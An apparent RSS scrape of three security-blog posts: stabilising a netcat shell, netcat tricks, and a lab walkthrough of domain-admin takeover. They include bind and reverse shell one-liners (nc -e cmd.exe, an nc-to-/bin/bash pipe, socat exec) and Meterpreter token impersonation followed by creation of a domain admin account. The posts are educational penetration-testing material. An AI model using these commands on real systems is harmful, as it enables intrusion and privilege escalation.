These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

]]>
https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/feed/ 0
Some tricks using Netcat https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/ https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/#respond Mon, 17 Jun 2013 16:02:07 +0000 https://www.gosecure.it/blog/?p=87 read more)]]> If you are here, I suppose you know that Netcat (NC) is an utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
Let’s see some exemples of use.
First of all let’s read the help output:

C:\>nc.exe -h
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

This is the Windows version of Netcat, but options are similar also in Linux. The version I found for MacOS don’t have the -e option, but you can recompile it to enable this option or use some workaround as I will explain.

First try: open two command windows in the same machine. In the first window start a service that listens on a specific port using Netcat (this is called listener)

C:\>nc.exe -l -v -p 4444

If you have a look at the network connection of your machine, using the command netstat -na, you will find a listening connection on port 4444 tcp 0.0.0.0:4444 LISTEN
In the second window use NC as a client and connect to localhost on port 4444

C:\>nc.exe 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially is a simple chat. If in window 1 you write something it will redirect to windows 2 and vice versa.
So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.

Lets try NC to pass simple text file. This time I will use Linux because of its more simple command shell, but you can implement the same thing on Windows.
So, I try to pass text file starting the folowing listener

root@kali:~# nc -lvp 4444 > file.txt

…and than connect

root@kali:~# echo "This text will be transmitted using Netcat" | nc 127.0.0.1 4444

This can be useful to create or modify remotly config file as this:

root@kali:~# nc -lp 4444 >> /etc/proxychains.conf
root@kali:~# cat new_proxy_to_add.txt | nc 127.0.0.1 4444

…or simply add something to your TODO list

root@kali:~# nc -lp 4444 >> /doc/TODO.txt
root@kali:~# echo -e "Wash girlfriend car\nBuy beer\nDebug my friend app" | nc 127.0.0.1 4444

And now let’s transfer a file (note the -w option used to end connection and to unlock the file transferred):

root@kali:~# nc -lp 4444 < myfile.zip
root@kali:~# nc -w 1 127.0.0.1 4444 > myfile_renamed.zip

Well, NC can be used to connect to listeners. If there is a service listening on some TCP/UDP port you can try to connect, and sometimes even interact with it:

root@kali:~# nc 127.0.0.1 21
220 (vsFTPd 2.3.5)
USER user-one
331 Please specify the password.
PASS ******
230 Login successful.

In some other case NC isn’t able to interact, but can be useful to grub banner and find what kind of service is listening. Look at the following command: you find a OpenSSH server on non-standard tcp port 2201.

root@kali:~# nc -v 127.0.0.1 2201
localhost [127.0.0.1] 2201 (?) open
SSH-2.0-OpenSSH_6.0p1 Debian-4

Protocol mismatch.

You can implement this idea using -z option and transfotm NC in a port scanner. You will also like to specify port range.

root@kali:~# nc -zv 127.0.0.1 1-3000
localhost [127.0.0.1] 2201 (?) open
localhost [127.0.0.1] 1111 (?) open
localhost [127.0.0.1] 80 (http) open
localhost [127.0.0.1] 21 (ftp) open

If you use the -o option you can dump all hex traffic:

root@kali:~# nc 127.0.0.1 4444 -vo /tmp/log.txt
localhost [127.0.0.1] 4444 (?) open
hello
my password is ****** yes six asterisks
^C
root@kali:~# cat /tmp/log.txt
< 00000000 68 65 6c 6c 6f 0a                               # hello.
> 00000000 6d 79 20 70 61 73 73 77 6f 72 64 20 69 73 20 2a # my password is *
> 00000010 2a 2a 2a 2a 2a 20 79 65 73 20 73 69 78 20 61 73 # ***** yes six as
> 00000020 74 65 72 69 73 6b 73 0a                         # terisks.

Let’s now talk about remote admin. You can use -e option to execute programs, in this case cmd.exe or /bin/bash.
So, start a listener in one terminal window:

c:\>nc.exe -lvp 4444 -e cmd.exe
listening on [any] 4444 ...

…and connect to it using a second command shell:

c:\>nc.exe 127.0.0.1 4444
Microsoft Windows [Versione 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tutti i diritti riservati.

c:\>hostname
hostname
windows-pc01

c:\FAKE_Path>

You can also set the listener without -e option and use it on the client. The result will be a remore shell of the client on the machine with the listener.
Of course you can put together text/command redirection and command execution. Look at the immage below.

Image 1

We have 3 PCs: machine A and B are Linux, machine C is Windows. Let’s start 2 listeners in two different windows in Machine A; then one listener with -e option on the Windows PC. When all listeners are ready let’s put all together running the 3 clients from Machine B. we wait some seconds and … TA-DAAA! In the Machine A we have a remote shell of the Windows system. Note that pipeling in Machine B has as effect that, in Machine A, you write the command in shell 1 and read output in shell 2.
This sound like a remote shell using a proxy…

Now let’s try the MacOS Netcat version. The only preconpiled version I found is an old one, non supporting “executing command” option (-e). Although we can compile a surce code that incluce the option we want, we can also modify the previous exemple to make command execution working.
Start on a machine (IP=10.0.0.1) two shell each one with a listener.

nc -lvp 4444
nc -lvp 3333

In the remote Mac you have to admin, start a pipeling as this:

user@mymac:~$ nc 10.0.0.1 4444 | /bin/bash | nc 10.0.0.1 3333

Great! You have a remote shell of your Mac.

That’s why netcat is so important. It is so simple and so powerful that you can use it either for basic connection tests or in a complex environment, but the most important thing is that is cross-platform, single file and stand-alone program. It can also be used to implement many complex environment as proxy, sniffer, logger, secure chat, debbugger, fuzzer. You can even use it backup your disk partition on another PC (how to copy compressed drive image over network).
Nowadays there are many Netcat clones, some of these use encryption or implement the remote command execution and the use of passwords; you can easely find it googling.

Obviously not always it work as we’ll wish. One exemple overall: when we start a remote shell using NC with -e option we don’t have a FULL interactive command prompt, but a NON interactive one. To better understand try this: connect to an FTP server using NC directly. You will prompt to insert USER and then PASS and everything works, but if you try to connect to the FTP server from a remote shell (using NC aswell) you will promt to insert USER and, when you hit enter, your session will hang.
In this post you can find some solutions to reach a full interactive shell from a NC non interactive shell.

You can find more info on NetCat Home Page.

]]>
https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/feed/ 0
Create a domain user admin through an exploited PC https://www.gosecure.it/blog/art/59/sec/create-a-domain-user-admin-through-an-exploited-domain-pc/ https://www.gosecure.it/blog/art/59/sec/create-a-domain-user-admin-through-an-exploited-domain-pc/#respond Tue, 07 May 2013 17:35:10 +0000 https://www.gosecure.it/blog/?p=59 read more)]]> The server and pc hardening is the process of securing a system, limiting the surface that can be attacked. One of its role is to limitate the use of amministrative right.
Nowadays users have to use an unprivileged accounts, also sysadmins have to remind this role when configuring service and scripts.
Sometimes, to let centralized software to work correctly, sysadmins install client agents to work with high privileged account and this can be used to scalate privileges.
This is how to create a domain user admin through an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                           Path
 ---   ----              ----  -------  ----                           ----
 0     [System Process]
 4     System            x86   0        NT AUTHORITY\SYSTEM
 1736  smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 1788  csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 1812  winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 1856  services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 1868  lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 2032  ibmpmsvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
 176   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 312   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 404   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 508   EvtEng.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
 604   S24EvMon.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
 824   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 848   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1228  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1304  svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1344  AcPrfMgrSvc.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
 1416  btwdins.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
 1484  RegSrvc.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
 1676  TpKmpSvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
 180   AcSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
 700   MOMService.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
 224   wmiprvse.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 948   SvcGuiHlpr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
 2580  alg.exe           x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
 3276  explorer.exe      x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
 3908  tp4mon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
 1112  igfxtray.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
 1124  hkcmd.exe         x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
 2192  igfxpers.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
 1860  ACTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
 2596  ACWLIcon.exe      x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
 2700  smax4pnp.exe      x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
 2904  ctfmon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
 3076  BTTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
 3572  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 2912  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 1472  rundll32.exe      x86   0        LAB\admin                 C:\WINDOWS\system32\rundll32.exe                           <---------- Look at these
 1256  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 3044  msiexec.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
 3224  rundll32.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin          <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

Create new domain user and join to the domain admins group:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.


C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.


Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”

]]>
https://www.gosecure.it/blog/art/59/sec/create-a-domain-user-admin-through-an-exploited-domain-pc/feed/ 0